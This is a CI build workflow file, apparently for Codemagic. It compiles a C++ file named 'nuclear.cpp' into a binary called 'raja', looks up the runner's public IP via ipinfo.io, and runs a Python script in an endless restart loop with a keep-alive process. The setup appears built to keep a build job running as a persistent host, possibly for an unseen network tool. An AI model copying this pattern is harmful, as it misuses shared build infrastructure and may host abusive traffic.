workflows:
  setup_and_run:
    name: Setup and Run Workflow
    instance_type: linux_x2  # Correct Linux instance type
    max_build_duration: 120  # Valid duration between 1-120 minutes

    environment:
      groups:
        - system_environment
      vars:
        PUBLIC_ENV_VAR: "value here"
        PYTHONPATH: .
        DEBIAN_FRONTEND: noninteractive  # Prevent interactive prompts

    scripts:
      - name: Prepare Environment
        script: |
          #!/bin/bash
          set -e  # Exit immediately if a command exits with a non-zero status
          echo "Preparing environment..."
          sudo apt-get update -qq
          sudo apt-get install -y -qq \
            build-essential \
            python3-pip \
            curl \
            gcc \
            g++ || exit 1
          pip3 install --quiet -r requirements.txt

      - name: Compile C++ Binary
        script: |
          echo "Compiling C++ file into binary..."
          g++ -o raja nuclear.cpp -std=c++11 -pthread
          chmod +x raja || exit 1

      - name: System Information
        script: |
          echo "System Details:"
          lscpu || true
          curl -s ipinfo.io || true

      - name: Application Monitoring
        script: |
          #!/bin/bash
          set -m  # Enable job control
          
          # Background keep-alive process
          (
            while true; do 
              echo "Monitoring: $(date)"
              sleep 300
            done
          ) &

          # Main application runner with restart logic
          while true; do 
            echo "Starting application..."
            python3 m.py || {
              echo "Application crashed. Restarting in 10 seconds..."
              sleep 10
            }
            sleep 30
          done

    artifacts:
      - raja
      - m.py
      - requirements.txt

    publishing:
      email:
        recipients:
          - www.rajapramod0@gmail.com
